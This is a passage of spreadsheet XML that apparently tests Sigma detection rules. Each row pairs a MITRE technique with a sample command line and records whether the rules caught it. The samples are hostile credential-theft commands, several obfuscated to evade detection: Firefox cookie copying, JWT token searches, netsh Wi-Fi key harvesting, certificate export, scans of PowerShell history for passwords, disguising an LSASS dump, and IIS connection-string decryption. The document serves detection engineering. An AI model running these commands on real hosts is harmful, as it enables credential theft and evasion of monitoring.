          <t>Suspicious Key Manager Access (a4694263-59a8-4608-a3a0-6f8d3a51664c); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J730" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K730" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="731" ht="15.75" customHeight="1" s="42">
      <c r="A731" s="43" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B731" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_keymgr</t>
        </is>
      </c>
      <c r="C731" s="43" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access</t>
        </is>
      </c>
      <c r="D731" s="43" t="inlineStr">
        <is>
          <t>a4694263-59a8-4608-a3a0-6f8d3a51664c</t>
        </is>
      </c>
      <c r="E731" s="43" t="inlineStr">
        <is>
          <t>copy keymgr.dll misc.dll &amp; rundll32.exe misc.dll,KRShowKeyMgr</t>
        </is>
      </c>
      <c r="F731" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G731" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H731" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I731" s="43" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access (a4694263-59a8-4608-a3a0-6f8d3a51664c)</t>
        </is>
      </c>
      <c r="J731" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K731" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="732" ht="15.75" customHeight="1" s="42">
      <c r="A732" s="43" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B732" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_firefox_gecko_profile_data</t>
        </is>
      </c>
      <c r="C732" s="43" t="inlineStr">
        <is>
          <t>SQLite Firefox Profile Data DB Access</t>
        </is>
      </c>
      <c r="D732" s="43" t="inlineStr">
        <is>
          <t>4833155a-4053-4c9c-a997-777fcea0baa7</t>
        </is>
      </c>
      <c r="E732" s="43" t="inlineStr">
        <is>
          <t>cmd /c copy "%APPDATA%\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite" %TEMP%\temp_data.db &amp;&amp; sqlite3 %TEMP%\temp_data.db "SELECT * FROM moz_cookies;"</t>
        </is>
      </c>
      <c r="F732" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G732" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H732" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I732" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b); Potential Browser Data Stealing (47147b5b-9e17-4d76-b8d2-7bac24c5ce1b)</t>
        </is>
      </c>
      <c r="J732" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K732" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="733" ht="15.75" customHeight="1" s="42">
      <c r="A733" s="43" t="inlineStr">
        <is>
          <t>t1528</t>
        </is>
      </c>
      <c r="B733" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_jwt_token_search</t>
        </is>
      </c>
      <c r="C733" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious JWT Token Search Via CLI</t>
        </is>
      </c>
      <c r="D733" s="43" t="inlineStr">
        <is>
          <t>6d3a3952-6530-44a3-8554-cf17c116c615</t>
        </is>
      </c>
      <c r="E733" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c findstr /S /M /I "eyJ0eX" %LOCALAPPDATA%\*.log</t>
        </is>
      </c>
      <c r="F733" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G733" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H733" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I733" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious JWT Token Search Via CLI (6d3a3952-6530-44a3-8554-cf17c116c615); Potentially Suspicious JWT Token Search Via CLI (6d3a3952-6530-44a3-8554-cf17c116c615); Insensitive Subfolder Search Via Findstr.EXE (04936b66-3915-43ad-a8e5-809eadfd1141); Insensitive Subfolder Search Via Findstr.EXE (04936b66-3915-43ad-a8e5-809eadfd1141)</t>
        </is>
      </c>
      <c r="J733" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K733" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="734" ht="15.75" customHeight="1" s="42">
      <c r="A734" s="43" t="inlineStr">
        <is>
          <t>t1528</t>
        </is>
      </c>
      <c r="B734" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_jwt_token_search</t>
        </is>
      </c>
      <c r="C734" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious JWT Token Search Via CLI</t>
        </is>
      </c>
      <c r="D734" s="43" t="inlineStr">
        <is>
          <t>6d3a3952-6530-44a3-8554-cf17c116c615</t>
        </is>
      </c>
      <c r="E734" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c findstr /S /M /I "eyJ0eXAiOi" %LOCALAPPDATA%\*.log</t>
        </is>
      </c>
      <c r="F734" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G734" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H734" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I734" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious JWT Token Search Via CLI (6d3a3952-6530-44a3-8554-cf17c116c615); Potentially Suspicious JWT Token Search Via CLI (6d3a3952-6530-44a3-8554-cf17c116c615); Insensitive Subfolder Search Via Findstr.EXE (04936b66-3915-43ad-a8e5-809eadfd1141); Insensitive Subfolder Search Via Findstr.EXE (04936b66-3915-43ad-a8e5-809eadfd1141)</t>
        </is>
      </c>
      <c r="J734" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K734" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="735" ht="15.75" customHeight="1" s="42">
      <c r="A735" s="43" t="inlineStr">
        <is>
          <t>t1528</t>
        </is>
      </c>
      <c r="B735" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_jwt_token_search</t>
        </is>
      </c>
      <c r="C735" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious JWT Token Search Via CLI</t>
        </is>
      </c>
      <c r="D735" s="43" t="inlineStr">
        <is>
          <t>6d3a3952-6530-44a3-8554-cf17c116c615</t>
        </is>
      </c>
      <c r="E735" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Select-String -Path $env:LOCALAPPDATA\* -Pattern 'eyJhbGciOi'"</t>
        </is>
      </c>
      <c r="F735" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G735" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H735" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I735" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious JWT Token Search Via CLI (6d3a3952-6530-44a3-8554-cf17c116c615); Potentially Suspicious JWT Token Search Via CLI (6d3a3952-6530-44a3-8554-cf17c116c615)</t>
        </is>
      </c>
      <c r="J735" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K735" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="736" ht="15.75" customHeight="1" s="42">
      <c r="A736" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B736" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_wifi_credential_harvesting</t>
        </is>
      </c>
      <c r="C736" s="43" t="inlineStr">
        <is>
          <t>Harvesting Of Wifi Credentials Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D736" s="43" t="inlineStr">
        <is>
          <t>42b1a5b8-353f-4f10-b256-39de4467faff</t>
        </is>
      </c>
      <c r="E736" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo wlan show profile name=SSID key=clear | netsh.exe"</t>
        </is>
      </c>
      <c r="F736" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G736" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H736" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I736" s="43" t="n"/>
      <c r="J736" s="43" t="n"/>
      <c r="K736" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="737" ht="15.75" customHeight="1" s="42">
      <c r="A737" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B737" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C737" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D737" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E737" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F737" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G737" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H737" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I737" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J737" s="43" t="n"/>
      <c r="K737" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="738" ht="15.75" customHeight="1" s="42">
      <c r="A738" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B738" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C738" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D738" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E738" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F738" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G738" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H738" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I738" s="43" t="n"/>
      <c r="J738" s="43" t="n"/>
      <c r="K738" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="739" ht="15.75" customHeight="1" s="42">
      <c r="A739" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B739" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C739" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D739" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E739" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F739" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G739" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H739" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I739" s="43" t="n"/>
      <c r="J739" s="43" t="n"/>
      <c r="K739" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="740" ht="15.75" customHeight="1" s="42">
      <c r="A740" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B740" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C740" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D740" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E740" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F740" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G740" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H740" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I740" s="43" t="n"/>
      <c r="J740" s="43" t="n"/>
      <c r="K740" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="741" ht="15.75" customHeight="1" s="42">
      <c r="A741" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B741" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C741" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D741" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E741" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F741" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G741" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H741" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I741" s="43" t="n"/>
      <c r="J741" s="43" t="n"/>
      <c r="K741" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="742" ht="15.75" customHeight="1" s="42">
      <c r="A742" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B742" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C742" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D742" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E742" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F742" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G742" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H742" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I742" s="43" t="n"/>
      <c r="J742" s="43" t="n"/>
      <c r="K742" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="743" ht="15.75" customHeight="1" s="42">
      <c r="A743" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B743" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C743" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D743" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E743" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F743" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G743" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H743" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I743" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J743" s="43" t="n"/>
      <c r="K743" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="744" ht="15.75" customHeight="1" s="42">
      <c r="A744" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B744" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C744" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D744" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E744" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F744" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G744" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H744" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I744" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J744" s="43" t="n"/>
      <c r="K744" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="745" ht="15.75" customHeight="1" s="42">
      <c r="A745" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B745" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_console_history_file_access</t>
        </is>
      </c>
      <c r="C745" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Console History Access Attempt via History File</t>
        </is>
      </c>
      <c r="D745" s="43" t="inlineStr">
        <is>
          <t>f4ff7323-b5fc-4323-8b52-6b9408e15788</t>
        </is>
      </c>
      <c r="E745" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "powershell.exe &amp; {ls -R C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_hist^ory.txt | Select-String ""password"", ""-p"", ""key"", ""pwd"", ""pass""}"</t>
        </is>
      </c>
      <c r="F745" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G745" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H745" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I745" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData (ac175779-025a-4f12-98b0-acdaeb77ea85)</t>
        </is>
      </c>
      <c r="J745" s="43" t="n"/>
      <c r="K745" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="746" ht="15.75" customHeight="1" s="42">
      <c r="A746" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B746" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C746" s="43" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D746" s="43" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E746" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F746" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G746" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H746" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I746" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J746" s="43" t="n"/>
      <c r="K746" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="747" ht="15.75" customHeight="1" s="42">
      <c r="A747" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B747" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C747" s="43" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D747" s="43" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E747" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F747" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G747" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H747" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I747" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J747" s="43" t="n"/>
      <c r="K747" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="748" ht="15.75" customHeight="1" s="42">
      <c r="A748" s="43" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
      <c r="B748" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C748" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D748" s="43" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E748" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Invoke-Expression ('Get-' + 'WinEvent' + ' -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"') | Where-Object {$_.Id -eq 21} | ForEach-Object { $eventXml = [xml]$_.ToXml(); $username = $eventXml.Event.UserData.EventXML.User; $ipAddress = $eventXml.Event.UserData.EventXML.Address; $loginTime = $_.TimeCreated; if ($username -and $ipAddress -and $loginTime) { Write-Output ('User: ' + $username + ' IP: ' + $ipAddress + ' Login Time: ' + $loginTime) }}"</t>
        </is>
      </c>
      <c r="F748" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G748" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H748" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I748" s="43" t="n"/>
      <c r="J748" s="43" t="n"/>
      <c r="K748" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="749" ht="15.75" customHeight="1" s="42">
      <c r="A749" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B749" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C749" s="43" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D749" s="43" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E749" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoP /"exec" bypass /"c" "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F749" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G749" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H749" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I749" s="43" t="n"/>
      <c r="J749" s="43" t="n"/>
      <c r="K749" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="750" ht="15.75" customHeight="1" s="42">
      <c r="A750" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B750" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C750" s="43" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D750" s="43" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E750" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop -exec bypass -"c" "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F750" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G750" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H750" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I750" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J750" s="43" t="n"/>
      <c r="K750" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="751" ht="15.75" customHeight="1" s="42">
      <c r="A751" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B751" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C751" s="43" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D751" s="43" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E751" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop -exec bypass /"c" "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F751" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G751" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H751" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I751" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J751" s="43" t="n"/>
      <c r="K751" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="752" ht="15.75" customHeight="1" s="42">
      <c r="A752" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B752" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C752" s="43" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D752" s="43" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E752" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile /"exec" bypass -C "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F752" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G752" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H752" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I752" s="43" t="n"/>
      <c r="J752" s="43" t="n"/>
      <c r="K752" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="753" ht="15.75" customHeight="1" s="42">
      <c r="A753" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B753" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C753" s="43" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D753" s="43" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E753" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"nop" /"exec" bypass -C "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F753" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G753" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H753" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I753" s="43" t="n"/>
      <c r="J753" s="43" t="n"/>
      <c r="K753" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="754" ht="15.75" customHeight="1" s="42">
      <c r="A754" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B754" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C754" s="43" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D754" s="43" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E754" s="43" t="inlineStr">
        <is>
